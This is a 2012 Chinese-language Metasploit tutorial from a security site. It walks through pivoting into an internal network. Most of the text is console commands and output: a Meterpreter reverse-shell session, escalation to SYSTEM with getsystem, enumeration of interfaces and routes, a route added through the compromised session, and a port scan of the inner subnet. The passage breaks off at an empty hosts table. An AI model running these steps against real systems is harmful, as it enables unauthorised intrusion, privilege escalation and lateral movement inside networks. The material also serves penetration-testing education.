频道栏目
首页 > 安全 > 工具软件 > 正文

Metasploit跨路由器访问

2012-11-05 07:20:00      个评论    来源:fuzzexp.org   作者:Dis9Team
收藏   我要投稿

首先得获得一个内网的SHELL 转移到SYSTEM权限

msf  exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.103:4444
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.1.100
[*] Meterpreter session 1 opened (192.168.1.103:4444 -> 192.168.1.100:51898) at 2012-11-04 20:49:37 +0800

meterpreter > getuid
Server username: BRK-FC17123537C\Administrator
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
接着查看网段

meterpreter > ifconfig

Interface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1520
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0

Interface  2
============
Name         : AMD PCNET Family PCI Ethernet Adapter - ���ݰ��ƻ�����΢�Ͷ˿�
Hardware MAC : 00:50:56:28:2c:de
MTU          : 1500
IPv4 Address : 5.5.5.9
IPv4 Netmask : 255.255.255.0

Interface  2
============
Name         : AMD PCNET Family PCI Ethernet Adapter - pencS��R
                                                                z�_�W�z�S
Hardware MAC : 00:50:56:28:2c:de
MTU          : 1500
IPv4 Address : 5.5.5.9
IPv4 Netmask : 255.255.255.0

meterpreter >
5.5.5.9 ping测试一下

meterpreter > background
[*] Backgrounding session 1...
msf  exploit(handler) > ping 5.5.5.9
[*] exec: ping 5.5.5.9

^CInterrupt: use the 'exit' command to quit
msf  exploit(handler) >
无反应 接着看下网络信息

msf  exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > route

IPv4 network routes
===================

    Subnet           Netmask          Gateway    Metric  Interface
    ------           -------          -------    ------  ---------
    0.0.0.0          0.0.0.0          5.5.5.2    10      2
    5.5.5.0          255.255.255.0    5.5.5.9    10      2
    5.5.5.9          255.255.255.255  127.0.0.1  10      1
    5.255.255.255    255.255.255.255  5.5.5.9    10      2
    127.0.0.0        255.0.0.0        127.0.0.1  1       1
    224.0.0.0        240.0.0.0        5.5.5.9    10      2
    255.255.255.255  255.255.255.255  5.5.5.9    1       2

No IPv6 routes were found.
meterpreter >
查找网络接口:

\
Local subnet: 5.5.5.0/255.255.255.0
只有一个 route 试试

meterpreter > background
[*] Backgrounding session 1...
msf  exploit(handler) > route add 5.5.5.0 255.255.255.0 1
[*] Route added
msf  exploit(handler) > route print

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   5.5.5.0            255.255.255.0      Session 1

msf  exploit(handler) >
注意 msf exploit(handler) > route add 5.5.5.0 255.255.255.0 1 的 最后一个 1 是sessions的会话ID route 的时候别弄错

来测试扫描一下

msf  exploit(handler) > use auxiliary/scanner/portscan/tcp
msf  auxiliary(tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                        yes       The target address range or CIDR identifier
   THREADS      1                yes       The number of concurrent threads
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

msf  auxiliary(tcp) > set RHOSTS 5.5.5.0-254
RHOSTS => 5.5.5.0-254
msf  auxiliary(tcp) > set PORTS 22,445,135,443,80,1433
PORTS => 22,445,135,443,80,1433
msf  auxiliary(tcp) > exploit

[*] 5.5.5.1:445 - TCP OPEN
[*] 5.5.5.1:135 - TCP OPEN
[*] 5.5.5.1:443 - TCP OPEN
[*] 5.5.5.3:22 - TCP OPEN
[*] 5.5.5.3:80 - TCP OPEN
[*] 5.5.5.4:22 - TCP OPEN
[*] 5.5.5.5:22 - TCP OPEN
[*] 5.5.5.6:80 - TCP OPEN
[*] 5.5.5.6:135 - TCP OPEN
[*] 5.5.5.6:1433 - TCP OPEN
[*] 5.5.5.6:445 - TCP OPEN
-----省略------
查看结果:

msf  auxiliary(tcp) > hosts

Hosts
=====

address        mac  name             os_name            os_flavor  os_sp  purpose   info  comment